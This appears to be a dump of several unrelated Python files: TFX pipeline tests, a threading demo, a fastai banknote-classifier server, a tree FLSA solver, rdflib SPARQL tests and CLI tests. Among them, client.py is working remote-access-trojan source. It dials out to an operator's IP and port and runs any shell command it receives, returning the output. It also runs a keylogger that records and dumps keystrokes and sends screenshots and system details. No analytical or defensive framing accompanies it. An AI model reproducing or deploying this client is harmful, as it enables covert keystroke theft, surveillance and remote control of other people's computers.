execution2.last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions([execution2])
execution2 = pipeline_ops.initiate_pipeline_start(m, pipeline2)
# Inactive pipelines should be ignored.
pipeline3 = _test_pipeline('pipeline3')
execution3 = pipeline_ops.initiate_pipeline_start(m, pipeline3)
execution3.last_known_state = metadata_store_pb2.Execution.COMPLETE
m.store.put_executions([execution3])
# For active pipelines pipeline1 and pipeline2, there are a couple of
# active executions.
def _exec_node_tasks():
for pipeline_id in ('pipeline1', 'pipeline2'):
yield [
test_utils.create_exec_node_task(
node_uid=task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid(
pipeline_id=pipeline_id, pipeline_run_id=None),
node_id='Transform')),
test_utils.create_exec_node_task(
node_uid=task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid(
pipeline_id=pipeline_id, pipeline_run_id=None),
node_id='Trainer'))
]
mock_async_task_gen.return_value.generate.side_effect = _exec_node_tasks()
task_queue = tq.TaskQueue()
pipeline_ops.generate_tasks(m, task_queue)
self.assertEqual(2, mock_async_task_gen.return_value.generate.call_count)
mock_sync_task_gen.assert_not_called()
# Verify that tasks are enqueued in the expected order.
for node_id in ('Transform', 'Trainer'):
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(node_id, task.node_uid.node_id)
self.assertEqual('pipeline1', task.node_uid.pipeline_uid.pipeline_id)
for node_id in ('Transform', 'Trainer'):
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual(node_id, task.node_uid.node_id)
self.assertEqual('pipeline2', task.node_uid.pipeline_uid.pipeline_id)
self.assertTrue(task_queue.is_empty())
@mock.patch.object(sync_pipeline_task_gen, 'SyncPipelineTaskGenerator')
@mock.patch.object(async_pipeline_task_gen, 'AsyncPipelineTaskGenerator')
@mock.patch.object(task_gen_utils, 'generate_task_from_active_execution')
def test_stop_initiated_async_pipelines(self, mock_gen_task_from_active,
mock_async_task_gen,
mock_sync_task_gen):
with self._mlmd_connection as m:
pipeline1 = _test_pipeline('pipeline1')
pipeline1.nodes.add().pipeline_node.node_info.id = 'Transform'
pipeline1.nodes.add().pipeline_node.node_info.id = 'Trainer'
pipeline1.nodes.add().pipeline_node.node_info.id = 'Evaluator'
pipeline_ops.initiate_pipeline_start(m, pipeline1)
pipeline1_execution = pipeline_ops._initiate_pipeline_stop(
m, task_lib.PipelineUid.from_pipeline(pipeline1))
task_queue = tq.TaskQueue()
# For the stop-initiated pipeline, "Transform" execution task is in queue,
# "Trainer" has an active execution in MLMD but no task in queue,
# "Evaluator" has no active execution.
task_queue.enqueue(
test_utils.create_exec_node_task(
node_uid=task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid(
pipeline_id='pipeline1', pipeline_run_id=None),
node_id='Transform')))
transform_task = task_queue.dequeue() # simulates task being processed
mock_gen_task_from_active.side_effect = [
test_utils.create_exec_node_task(
node_uid=task_lib.NodeUid(
pipeline_uid=task_lib.PipelineUid(
pipeline_id='pipeline1', pipeline_run_id=None),
node_id='Trainer'),
is_cancelled=True), None, None, None, None
]
pipeline_ops.generate_tasks(m, task_queue)
# There are no active pipelines so these shouldn't be called.
mock_async_task_gen.assert_not_called()
mock_sync_task_gen.assert_not_called()
# Simulate finishing the "Transform" ExecNodeTask.
task_queue.task_done(transform_task)
# CancelNodeTask for the "Transform" ExecNodeTask should be next.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_cancel_node_task(task))
self.assertEqual('Transform', task.node_uid.node_id)
# ExecNodeTask for "Trainer" is next.
task = task_queue.dequeue()
task_queue.task_done(task)
self.assertTrue(task_lib.is_exec_node_task(task))
self.assertEqual('Trainer', task.node_uid.node_id)
self.assertTrue(task_queue.is_empty())
mock_gen_task_from_active.assert_has_calls([
mock.call(
m,
pipeline1,
pipeline1.nodes[1].pipeline_node,
mock.ANY,
is_cancelled=True),
mock.call(
m,
pipeline1,
pipeline1.nodes[2].pipeline_node,
mock.ANY,
is_cancelled=True)
])
self.assertEqual(2, mock_gen_task_from_active.call_count)
# Pipeline execution should continue to be active since active node
# executions were found in the last call to `generate_tasks`.
[execution] = m.store.get_executions_by_id([pipeline1_execution.id])
self.assertTrue(execution_lib.is_execution_active(execution))
# Call `generate_tasks` again; this time there are no more active node
# executions so the pipeline should be marked as cancelled.
pipeline_ops.generate_tasks(m, task_queue)
self.assertTrue(task_queue.is_empty())
[execution] = m.store.get_executions_by_id([pipeline1_execution.id])
self.assertEqual(metadata_store_pb2.Execution.CANCELED,
execution.last_known_state)
def test_to_status_not_ok_error_decorator(self):
@pipeline_ops._to_status_not_ok_error
def fn1():
raise RuntimeError('test error 1')
@pipeline_ops._to_status_not_ok_error
def fn2():
raise status_lib.StatusNotOkError(
code=status_lib.Code.ALREADY_EXISTS, message='test error 2')
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'test error 1') as ctxt:
fn1()
self.assertEqual(status_lib.Code.UNKNOWN, ctxt.exception.code)
with self.assertRaisesRegex(status_lib.StatusNotOkError,
'test error 2') as ctxt:
fn2()
self.assertEqual(status_lib.Code.ALREADY_EXISTS, ctxt.exception.code)
if __name__ == '__main__':
tf.test.main()
|
thread.py
|
import threading
import multiprocessing
"""
@desc :多线程
@author Pings
@date 2018/05/15
@version V1.0
"""
# **多线程无法利用多核心cpu
def loop():
x = 0
while True:
x = x ^ 1
print(threading.current_thread().name, x)
for i in range(multiprocessing.cpu_count()):
t = threading.Thread(target=loop)
t.start()
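# A hedged sketch of the process-based alternative: to actually use every core,
# the same loop could be run in separate processes instead (not started here):
#   for _ in range(multiprocessing.cpu_count()):
#       multiprocessing.Process(target=loop).start()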
|
client.py
|
# Imports required by this class (missing from the original snippet). Listener is
# assumed to come from pynput; SYSINFO and SCREENSHOT are assumed to be
# project-local helper classes defined elsewhere in the codebase.
import base64
import os
import socket
import subprocess
import threading
import time
from pynput.keyboard import Listener
class CLIENT:
SOCK = None
KEY = ")J@NcRfU"
KEYLOGGER_STATUS = False
KEYLOGGER_STROKES = ""
def __init__(self, _ip, _pt):
self.ipaddress = _ip
self.port = _pt
def send_data(self, tosend, encode=True):
if encode:
self.SOCK.send(base64.encodebytes(tosend.encode('utf-8')) + self.KEY.encode('utf-8'))
else:
self.SOCK.send(base64.encodebytes(tosend) + self.KEY.encode('utf-8'))
def turn_keylogger(self, status):
def on_press(key):
if not self.KEYLOGGER_STATUS:
return False
key = str(key)
if len(key.strip('\'')) == 1:
self.KEYLOGGER_STROKES += key.strip('\'')
else:
self.KEYLOGGER_STROKES += ("[" + key + "]")
def on_release(key):
if not self.KEYLOGGER_STATUS:
return False
def logger():
with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
if status:
if not self.KEYLOGGER_STATUS:
self.KEYLOGGER_STATUS = True
t = threading.Thread(target=logger)
t.daemon = True
t.start()
else:
self.KEYLOGGER_STATUS = False
def execute(self, command):
data = command.decode('utf-8').split(":")
if data[0] == "shell":
#print("Executing Shell: " + data[1])
toexecute = data[1].rstrip(" ").lstrip(" ")
toexecute = " ".join(toexecute.split())
if toexecute.split(" ")[0] == "cd":
try:
os.chdir(toexecute.split(" ")[1])
self.send_data("")
except:
self.send_data("Error while changing directory!")
else:
try:
comm = subprocess.Popen(data[1], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output, errors = comm.communicate()
self.send_data(output + errors)
except FileNotFoundError:
self.send_data("No Such File or Directory")
elif data[0] == "keylogger":
#print("Executing Keylogger: " + data[1])
if data[1] == "on":
self.turn_keylogger(True)
self.send_data("")
elif data[1] == "off":
self.turn_keylogger(False)
self.send_data("")
elif data[1] == "dump":
self.send_data(self.KEYLOGGER_STROKES)
elif data[0] == "sysinfo":
#print("Executing Sysinfo: " + data[1])
sysinfo = SYSINFO()
self.send_data(sysinfo.get_data())
elif data[0] == "screenshot":
#print("Executing Screenshot: " + data[1])
screenshot = SCREENSHOT()
self.send_data(screenshot.get_data(), encode=False)
def acceptor(self):
data = ""
chunk = b""
while True:
chunk = self.SOCK.recv(4096)
if not chunk:
break
data += chunk.decode('utf-8')
if self.KEY.encode('utf-8') in chunk:
# str.rstrip() strips a set of characters, not a suffix; remove the KEY delimiter explicitly
data = data[:-len(self.KEY)] if data.endswith(self.KEY) else data
t = threading.Thread(target=self.execute, args=(base64.decodebytes(data.encode('utf-8')),))
t.daemon = True
t.start()
data = ""
def engage(self):
self.SOCK = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while True:
try:
print("Connecting To: %s:%d" % (self.ipaddress, self.port))
self.SOCK.connect((self.ipaddress, self.port))
except:
print("Failed to Connect. Trying Again!")
time.sleep(5)
continue
self.acceptor()
|
server.py
|
from starlette.applications import Starlette
from starlette.responses import HTMLResponse, JSONResponse
from starlette.staticfiles import StaticFiles
from starlette.middleware.cors import CORSMiddleware
import sys  # used below for the 'serve' command-line check
import uvicorn, aiohttp, asyncio
from io import BytesIO
import requests, hashlib
from fastai import *
from fastai.vision import *
from google.cloud import storage
# The first assignment is immediately overridden below; the 'multi-class' model is the one actually served.
model_name = 'single-class'
model_name = 'multi-class'
model_file_id_multi = '16HFcpNFgn465xyrapyIuDSR0YrciJ6pd'
model_file_id_single = '19xqtsyusFddcSkdCm1hlhW3y6ljGck5L'
model_file_id = model_file_id_multi
classes_multi = ['1', '10', '100', '20', '200', '5', '50', '500', 'euro', 'usd']
classes_single = ['euro/10',
'euro/100',
'euro/20',
'euro/200',
'euro/5',
'euro/50',
'euro/500',
'usd/1',
'usd/10',
'usd/100',
'usd/20',
'usd/5',
'usd/50']
classes = classes_multi
path = Path(__file__).parent
bucket_name = "iris-user-uploads"
app = Starlette()
app.add_middleware(CORSMiddleware, allow_origins=['*'], allow_headers=['X-Requested-With', 'Content-Type'])
def download_file_from_google_drive(id, destination):
if destination.exists():
return
print("Downloading model from Google Drive",end="")
URL = "https://docs.google.com/uc?export=download"
session = requests.Session()
response = session.get(URL, params = { 'id' : id }, stream = True)
token = get_confirm_token(response)
if token:
params = { 'id' : id, 'confirm' : token }
response = session.get(URL, params = params, stream = True)
save_response_content(response, destination)
print("done.")
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
def save_response_content(response, destination):
CHUNK_SIZE = 32768
with open(destination, "wb") as f:
for chunk in response.iter_content(CHUNK_SIZE):
if chunk: # filter out keep-alive new chunks
print(".",end="")
f.write(chunk)
async def setup_learner():
model_file_name = Path('models')/f'{model_name}.pkl'
download_file_from_google_drive(model_file_id, path/model_file_name)
try:
learn = load_learner(path, model_file_name)
return learn
except RuntimeError as e:
if len(e.args) > 0 and 'CPU-only machine' in e.args[0]:
print(e)
message = "\n\nThis model was trained with an old version of fastai and will not work in a CPU environment.\n\nPlease update the fastai library in your training environment and export your model again.\n\nSee instructions for 'Returning to work' at https://course.fast.ai."
raise RuntimeError(message)
else:
raise
def upload_blob(bucket_name, img_blob,filename):
"""Uploads a file to the GCS bucket."""
storage_client = storage.Client()
bucket = storage_client.get_bucket(bucket_name)
print('Uploading user image.')
destination_blob_name = filename+"-"+hashlib.md5(img_blob).hexdigest()+".png"
print(destination_blob_name)
blob = bucket.blob(destination_blob_name)
print(blob.exists(storage_client))
if not blob.exists(storage_client):
blob.upload_from_string(img_blob,content_type='image/png')
print('File {} uploaded.'.format(
destination_blob_name))
else:
print('File already uploaded')
loop = asyncio.get_event_loop()
tasks = [asyncio.ensure_future(setup_learner())]
learn = loop.run_until_complete(asyncio.gather(*tasks))[0]
loop.close()
@app.route('/')
def index(request):
html = path/'view'/'index.html'
return HTMLResponse(html.open().read())
@app.route('/status')
def status(request):
status = {"online":True}
return JSONResponse(status)
from threading import Thread
@app.route('/analyze', methods=['POST'])
async def analyze(request):
data = await request.form()
img_bytes = await (data['file'].read())
img = open_image(BytesIO(img_bytes))
prediction = learn.predict(img)
response = {'result': str(prediction[0]),
'classes': str(classes),
'activations': str(prediction[2])}
if ("skip_upload" in data) and (data['skip_upload']=="true"):
response['skip_upload']=True
else:
filename="pred-"+str(prediction[0]).replace(";", "_")
Thread(target=upload_blob, args=(bucket_name, img_bytes,filename)).start()
print(response)
return JSONResponse(response)
if __name__ == '__main__':
if 'serve' in sys.argv: uvicorn.run(app, host='0.0.0.0', port=8080)
|
tree_apx.py
|
#!/usr/bin/env python
"""
Solve FLSA on trees by computing the derivative one point at a time.
The C++ code in tree12.cpp and tree12c.cpp was developed from this prototype.
A lot of experimental code concerning node orderings is included.
"""
import argparse
import sys
import h5py
import numpy as np
import numba
import multiprocessing
from graphidx.timer import Timer
from graphidx.graphviz import show_tree
from .graphio import load_tree
from .bfs import compute_bfs, compute_children, compute_levels, reverse_levels
PRINT_MAX = 10
float_t = "f4"
int_t = "i4"
Node = numba.from_dtype(
np.dtype(
[
# ('id', int_t), # only for debugging
("y", float_t),
("x", float_t),
("deriv", float_t),
("parent", int_t),
]
)
)
double = Node.fields["x"][0]
int64 = Node.fields["parent"][0]
def njit(*argp, **args):
"""Enable/Disable caching for all JIT functions"""
return numba.njit(cache=True, *argp, **args)
def iperm(perm):
"""Return an inverse permutation"""
@njit
def iperm_(perm, iperm):
"""Inverse permuation: Implementation"""
for i, j in enumerate(perm):
iperm[j] = i
return iperm
return iperm_(perm, np.empty_like(perm))
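# Example: iperm(np.array([2, 0, 1])) -> array([1, 2, 0]),
# i.e. result[j] is the position at which the value j appears in perm.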
@njit
def init(nodes, y_mid, y, parent, order, iorder):
for i, ii in enumerate(order):
nodes[i].y = y[ii]
nodes[i].x = y_mid
# nodes[i].id = ii
nodes[i].parent = iorder[parent[ii]]
@njit(locals=dict(x=double, a=double, b=double))
def clip(x, a, b):
return max(min(x, b), a)
# @njit(locals=dict(nodes=Node[:], preorder=int64[:], delta=double,
# lam=double, mu=double, c=double, d=double))
def discrete_flsa(nodes, delta, lam, mu=0.5):
n = len(nodes)
for v in nodes:
v.deriv = 2.0 * mu * (v.x - v.y)
# compute derivative
for v in nodes:
p = nodes[v.parent]
if abs(p.x - v.x) < delta:
p.deriv += clip(v.deriv, -lam, +lam)
elif v.x < p.x:
# ==> v.deriv was bigger when v.x == p.x in former iterations
# ==> v.deriv was clipped down to +lam (and stays there)
p.deriv += lam
else:
p.deriv -= lam
# print(' --> % .3f' % p.deriv)
# optimize root node
r = nodes[-1]
c = 0.5 * delta
# print("c:", c)
r.x += c if r.deriv < 0 else -c
# print("r.i", r.i)
# backtracing
for i in range(n - 2, -1, -1):
v = nodes[i]
p = nodes[v.parent]
if abs(p.x - v.x) <= delta: # in same range?
if v.deriv > lam: # usual clipping
v.x -= c
elif v.deriv < -lam:
v.x += c
else:
v.x = p.x
else: # in different ranges
d = v.deriv + (-lam if v.x < p.x else +lam)
v.x += c if d < 0 else -c
# print(' --> % .3f' % v.x)
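# Usage sketch (illustrative): after init() has filled `nodes`, each bisection step
# refines every x to one of two candidates and then halves the grid spacing, e.g.
#   discrete_flsa(nodes, delta, lam)
#   delta /= 2
# exactly as done in the iteration loop of process_tree() below.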
def discrete_solution(x_opt, x_base, delta):
"""Round optimal continuous solution x_opt to next
discrete solution according to x_base + sgn*delta (sgn in [-1, +1])"""
delta *= 0.5
x_opt = x_opt.flatten()
xr = np.empty(x_opt.shape)
n = len(x_opt)
for i in range(n):
xr[i] = x_base[i]
pos = xr[i] + delta
neg = xr[i] - delta
xr[i] = pos if abs(pos - x_opt[i]) < abs(neg - x_opt[i]) else neg
return xr
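# Worked example: discrete_solution(np.array([0.3]), np.array([0.5]), 0.5)
# compares the candidates 0.5 +/- 0.25 against 0.3 and returns array([0.25]).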
def extract_x(nodes, order):
"""Reorder the nodes.x values and return as numpy array"""
@njit
def _extract_x(x, nodes, order):
for i, ii in enumerate(order):
x[ii] = nodes[i].x
return x
return _extract_x(
np.empty(len(nodes), dtype=Node.fields["x"][0].name), nodes, order
)
def process_tree(treeh5, args=None):
"""
Load data from `treeh5`, optimize and print the difference to optimum.
"""
with Timer("Loading Tree"):
tree = load_tree(treeh5)
with h5py.File(treeh5, "r") as io:
y = io["y"][()]
lam = io["lam"][()]
if not isinstance(lam, float):
lam = float(lam[0])
xt = (
io["xt"][()]
if "xt" in io
else io["x++"][()]
if "x++" in io
else None
)
parent = tree.parent
root = tree.root
n = len(tree)
y = y.flatten()
nodes = np.zeros(n, dtype=Node)
nodes = np.rec.array(nodes)
print(f" n={n:,d}".replace(",", "_"))
if args is not None and args.scale_y:
y_min, y_max = y.min(), y.max()
y = y - y_min
if y_max - y_min > 1e-10:
y = y / (y_max - y_min)
y_min, y_max = y.min(), y.max()
if n == 6: # for debugging
y_min, y_max = 0.0, 1.0
y_mid = 0.5 * (y_min + y_max)
delta = 0.5 * (y_max - y_min)
with Timer("Computing Children"):
vc, ci = compute_children(parent)
with Timer("Computing BFS"):
bfs = compute_bfs(vc, ci, root=root)
with Timer("Reverse BFS"):
rbfs = bfs.copy()[::-1]
with h5py.File(treeh5, "r+") as io:
if "bfs" not in io:
with Timer("Write BFS"):
io.create_dataset("bfs", data=bfs)
preorder = bfs.copy()
levels = None
if args is not None and args.use_levels:
with Timer("Computing Levels"):
levels = compute_levels(bfs, parent)
if n <= PRINT_MAX:
if levels is not None:
print(" levels:", levels)
for i in range(len(levels) - 1):
print(" %d:" % i, bfs[levels[i] : levels[i + 1]])
print("\nrlevels:", levels[::-1])
nl = len(levels)
for i in range(len(levels) - 1):
low = levels[nl - i - 2]
upp = levels[nl - i - 1]
print(" %d [%d:%d):" % (i, low, upp), bfs[low:upp])
with Timer("Inverse Order"):
if args is not None and args.use_levels:
postorder = reverse_levels(levels, bfs)
backord = iperm(postorder)[reverse_levels(levels, bfs)][::-1]
else:
postorder = rbfs.copy()
backord = np.arange(n)[::-1]
ipostord = iperm(postorder)
if "i" in Node.fields:
for i, ii in enumerate(postorder):
nodes[i].i = ii
if n <= PRINT_MAX:
vc, ci = compute_children(parent)
print(" children:", vc)
print(" cnums:", ci)
print(" rbfs:", rbfs)
print(" preorder:", preorder)
print("postorder:", postorder)
if levels is not None:
print(" levelord:", reverse_levels(levels, bfs))
print(" backord:", backord)
print(" ipostord:", ipostord)
print(" iorder:", ipostord[preorder])
print("identity?:", postorder[ipostord])
print(" y:", y)
parent = int64(parent)
with Timer("Init ...."):
init(nodes, double(y_mid), double(y), parent, postorder, ipostord)
if n <= PRINT_MAX:
# print(nodes)
print("parent:", parent)
print("access:", ipostord[parent[postorder]])
if "i" in Node.fields:
print("parent:", np.array([nodes[nodes[i].parent].i for i in postorder]))
print(" x0:", nodes.x[ipostord])
with Timer("Iterations:", end="\n"):
for it in range(args.max_iter):
print(it + 1, "...")
if n <= PRINT_MAX:
print("delta:", delta)
if "i" in Node.fields:
print("nodes.i:", nodes.i)
print(" ident?:", nodes.i[ipostord])
xb = nodes.x[ipostord]
discrete_flsa(nodes, delta, lam)
if n <= PRINT_MAX:
if "i" in Node.fields:
print(" i:", nodes.i[ipostord])
print("deriv:", nodes.deriv[ipostord])
print(" y:", nodes.y[ipostord])
x = nodes.x[ipostord]
print(" x:", x)
if xt is not None:
sol = discrete_solution(xt, xb, delta)
print(" sol:", sol)
print(" diff:", sol - x)
if np.abs(sol - x).max() >= 1e-7:
raise RuntimeError("!!!! INTERNAL ERROR !!!!")
delta /= 2
with Timer("Extract solution"):
x = extract_x(nodes, postorder)
if n <= PRINT_MAX:
print(" x:", x)
if xt is not None:
print(" xt:", xt.flatten())
if xt is not None:
print("Norm(x - xt, Inf): ", np.linalg.norm(x - xt.flatten(), np.inf))
if args is not None and args.dot_tree:
with Timer("Show Tree"):
show_tree(parent)
if args is not None and args.show_levels:
def plot():
import matplotlib.pyplot as plt
plt.plot(np.diff(levels))
plt.show()
multiprocessing.Process(target=plot).start()
if __name__ == "__main__":
p = argparse.ArgumentParser(description=__doc__)
p.add_argument(
"-i", "--max-iter", type=int, default=3, help="Number of iterations"
)
p.add_argument(
"-d",
"--dot-tree",
action="store_true",
help="Show the tree (using graphviz)",
)
p.add_argument(
"-L",
"--show-levels",
action="store_true",
help="Show the distribution of tree levels (depth)",
)
p.add_argument(
"-l",
"--use-levels",
action="store_true",
help="Postorder = reverse Levels(BFS)",
)
p.add_argument("-s", "--scale-y", action="store_true", help="Scale y to [0,1]")
p.add_argument("-v", "--verbose", action="store_true", help="Be more verbose")
p.add_argument("treeh5", type=str, nargs="*", help="Tree(s) to process")
args = p.parse_args()
np.set_printoptions(precision=3)
for t in args.treeh5:
print("Processing", t, file=sys.stderr)
if args.verbose:
PRINT_MAX = 20
process_tree(t, args)
# Local Variables:
# compile-command: "python -m treelas.tree_apx ../../data/test/tree.mini.h5"
# End:
|
test_sparqlstore.py
|
from rdflib import Graph, URIRef, Literal
from urllib.request import urlopen
import unittest
from nose import SkipTest
from http.server import BaseHTTPRequestHandler, HTTPServer
import socket
from threading import Thread
from unittest.mock import patch
from rdflib.namespace import RDF, XSD, XMLNS, FOAF, RDFS
from rdflib.plugins.stores.sparqlstore import SPARQLConnector
from . import helper
from .testutils import MockHTTPResponse, SimpleHTTPMock, ctx_http_server
try:
assert len(urlopen("http://dbpedia.org/sparql").read()) > 0
except Exception:
raise SkipTest("No HTTP connection.")
class SPARQLStoreDBPediaTestCase(unittest.TestCase):
store_name = "SPARQLStore"
path = "http://dbpedia.org/sparql"
storetest = True
create = False
def setUp(self):
self.graph = Graph(store="SPARQLStore")
self.graph.open(self.path, create=self.create)
ns = list(self.graph.namespaces())
assert len(ns) > 0, ns
def tearDown(self):
self.graph.close()
def test_Query(self):
query = "select distinct ?Concept where {[] a ?Concept} LIMIT 1"
_query = SPARQLConnector.query
with patch("rdflib.plugins.stores.sparqlstore.SPARQLConnector.query") as mock:
SPARQLConnector.query.side_effect = lambda *args, **kwargs: _query(
self.graph.store, *args, **kwargs
)
res = helper.query_with_retry(self.graph, query, initNs={})
count = 0
for i in res:
count += 1
assert type(i[0]) == URIRef, i[0].n3()
assert count > 0
mock.assert_called_once()
args, kwargs = mock.call_args
def unpacker(query, default_graph=None, named_graph=None):
return query, default_graph, named_graph
(mquery, _, _) = unpacker(*args, *kwargs)
for _, uri in self.graph.namespaces():
assert mquery.count(f"<{uri}>") == 1
def test_initNs(self):
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
res = helper.query_with_retry(self.graph,
query, initNs={"xyzzy": "http://www.w3.org/2004/02/skos/core#"}
)
for i in res:
assert type(i[0]) == Literal, i[0].n3()
def test_noinitNs(self):
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
self.assertRaises(ValueError, self.graph.query, query)
def test_query_with_added_prolog(self):
prologue = """\
PREFIX xyzzy: <http://www.w3.org/2004/02/skos/core#>
"""
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
res = helper.query_with_retry(self.graph, prologue + query)
for i in res:
assert type(i[0]) == Literal, i[0].n3()
def test_query_with_added_rdf_prolog(self):
prologue = """\
PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>
PREFIX xyzzy: <http://www.w3.org/2004/02/skos/core#>
"""
query = """\
SELECT ?label WHERE
{ ?s a xyzzy:Concept ; xyzzy:prefLabel ?label . } LIMIT 10
"""
res = helper.query_with_retry(self.graph, prologue + query)
for i in res:
assert type(i[0]) == Literal, i[0].n3()
def test_counting_graph_and_store_queries(self):
query = """
SELECT ?s
WHERE {
?s ?p ?o .
}
LIMIT 5
"""
g = Graph("SPARQLStore")
g.open(self.path)
count = 0
result = helper.query_with_retry(g, query)
for _ in result:
count += 1
assert count == 5, "Graph(\"SPARQLStore\") didn't return 5 records"
from rdflib.plugins.stores.sparqlstore import SPARQLStore
st = SPARQLStore(query_endpoint=self.path)
count = 0
result = helper.query_with_retry(st, query)
for _ in result:
count += 1
assert count == 5, "SPARQLStore() didn't return 5 records"
class SPARQLStoreUpdateTestCase(unittest.TestCase):
def setUp(self):
port = self.setup_mocked_endpoint()
self.graph = Graph(store="SPARQLUpdateStore", identifier=URIRef("urn:ex"))
self.graph.open(
(
"http://localhost:{port}/query".format(port=port),
"http://localhost:{port}/update".format(port=port),
),
create=False,
)
ns = list(self.graph.namespaces())
assert len(ns) > 0, ns
def setup_mocked_endpoint(self):
# Configure mock server.
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(("localhost", 0))
address, port = s.getsockname()
s.close()
mock_server = HTTPServer(("localhost", port), SPARQL11ProtocolStoreMock)
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
mock_server_thread = Thread(target=mock_server.serve_forever)
        mock_server_thread.daemon = True
mock_server_thread.start()
print(
"Started mocked sparql endpoint on http://localhost:{port}/".format(
port=port
)
)
return port
def tearDown(self):
self.graph.close()
def test_Query(self):
query = "insert data {<urn:s> <urn:p> <urn:o>}"
res = self.graph.update(query)
print(res)
class SPARQL11ProtocolStoreMock(BaseHTTPRequestHandler):
def do_POST(self):
"""
If the body should be analysed as well, just use:
```
body = self.rfile.read(int(self.headers['Content-Length'])).decode()
print(body)
```
"""
contenttype = self.headers.get("Content-Type")
if self.path == "/query" or self.path == "/query?":
if self.headers.get("Content-Type") == "application/sparql-query":
pass
elif (
self.headers.get("Content-Type") == "application/x-www-form-urlencoded"
):
pass
else:
self.send_response(406, "Not Acceptable")
self.end_headers()
elif self.path == "/update" or self.path == "/update?":
if self.headers.get("Content-Type") == "application/sparql-update":
pass
elif (
self.headers.get("Content-Type") == "application/x-www-form-urlencoded"
):
pass
else:
self.send_response(406, "Not Acceptable")
self.end_headers()
else:
print("self.path")
print(self.path)
self.send_response(404, "Not Found")
self.end_headers()
self.send_response(200, "OK")
self.end_headers()
return
def do_GET(self):
# Process an HTTP GET request and return a response with an HTTP 200 status.
self.send_response(200, "OK")
self.end_headers()
return
class SPARQLMockTests(unittest.TestCase):
def test_query(self):
httpmock = SimpleHTTPMock()
triples = {
(RDFS.Resource, RDF.type, RDFS.Class),
(RDFS.Resource, RDFS.isDefinedBy, URIRef(RDFS)),
(RDFS.Resource, RDFS.label, Literal("Resource")),
(RDFS.Resource, RDFS.comment, Literal("The class resource, everything.")),
}
rows = "\n".join([f'"{s}","{p}","{o}"' for s, p, o in triples])
response_body = f"s,p,o\n{rows}".encode()
response = MockHTTPResponse(
200, "OK", response_body, {"Content-Type": ["text/csv; charset=utf-8"]}
)
httpmock.do_get_responses.append(response)
graph = Graph(store="SPARQLStore", identifier="http://example.com")
graph.bind("xsd", XSD)
graph.bind("xml", XMLNS)
graph.bind("foaf", FOAF)
graph.bind("rdf", RDF)
assert len(list(graph.namespaces())) >= 4
with ctx_http_server(httpmock.Handler) as server:
(host, port) = server.server_address
url = f"http://{host}:{port}/query"
graph.open(url)
query_result = graph.query("SELECT ?s ?p ?o WHERE { ?s ?p ?o }")
rows = set(query_result)
assert len(rows) == len(triples)
for triple in triples:
assert triple in rows
httpmock.do_get_mock.assert_called_once()
assert len(httpmock.do_get_requests) == 1
request = httpmock.do_get_requests.pop()
assert len(request.path_query["query"]) == 1
query = request.path_query["query"][0]
for _, uri in graph.namespaces():
assert query.count(f"<{uri}>") == 1
if __name__ == "__main__":
unittest.main()
|
test.py
|
import unittest
import os
import subprocess
import sys
import ast
import noise_observer as no
from utils import *
from config_manager import ConfigManager
from threading import Thread
class TestCli(unittest.TestCase):
"""
Tests used to test command line interface.
Tests are based on the execution of a new run-time generated python script
that will use command line interface and print resulting dictionary with flags
on a file.
"""
def setUp(self):
# Creates scripts for cli testing.
create_run_script(".test_calibrate.py", ".test_calibrate.txt")
create_run_script(".test_seconds.py", ".test_seconds.txt")
create_run_script(".test_log.py", ".test_log.txt")
create_run_script(".test_record.py", ".test_record.txt")
def test_calibrate(self):
"""
Test of calibrate flag.
"""
res = subprocess.run([sys.executable, ".test_calibrate.py", "--calibrate"])
with open(".test_calibrate.txt", "r") as f:
kargs = ast.literal_eval(f.read())
self.assertEqual(kargs['calibrate'], True)
os.remove(".test_calibrate.txt")
def test_record(self):
"""
Test of record flag.
"""
record_thr = 100
res = subprocess.run([sys.executable, ".test_record.py", "--record", str(record_thr)])
with open(".test_record.txt", "r") as f:
kargs = ast.literal_eval(f.read())
self.assertEqual(kargs['record'], record_thr)
os.remove(".test_record.txt")
def test_seconds(self):
"""
Test of seconds flag.
"""
sec = 5
res = subprocess.run([sys.executable, ".test_seconds.py", "--seconds", str(sec)])
with open(".test_seconds.txt", "r") as f:
kargs = ast.literal_eval(f.read())
self.assertEqual(kargs['seconds'], sec)
os.remove(".test_seconds.txt")
def test_log(self):
"""
Test of log flag.
"""
log_file = ".log.log"
res = subprocess.run([sys.executable, ".test_log.py", "--log", log_file])
self.assertEqual(os.path.exists(log_file), True)
os.remove(".test_log.txt")
os.remove(log_file)
def tearDown(self):
os.remove(".test_seconds.py")
os.remove(".test_calibrate.py")
os.remove(".test_log.py")
os.remove(".test_record.py")
class TestConfig(unittest.TestCase):
"""
Test of config file reading and writing of index.
"""
def test_setindex(self):
"""
Test of setindex flag and correct update of configuration file.
"""
index = 0
res = subprocess.run([sys.executable, "inspect_noise.py", "--setindex", str(index)])
cnf_manager = ConfigManager()
self.assertEqual(int(cnf_manager.get_config_value("input_device_index")), index)
def test_check_default_config_params(self):
"""
Test of correct setting of default params.
        Update this test if the default configuration parameters change.
"""
default_frames = 1024
default_format = 8
default_channels = 2
default_input_device_index = 0
default_rate = 44100
default_audio_seg_length = 1
config = ConfigManager()
self.assertEqual(int(config.get_config_value("input_device_index")), default_input_device_index)
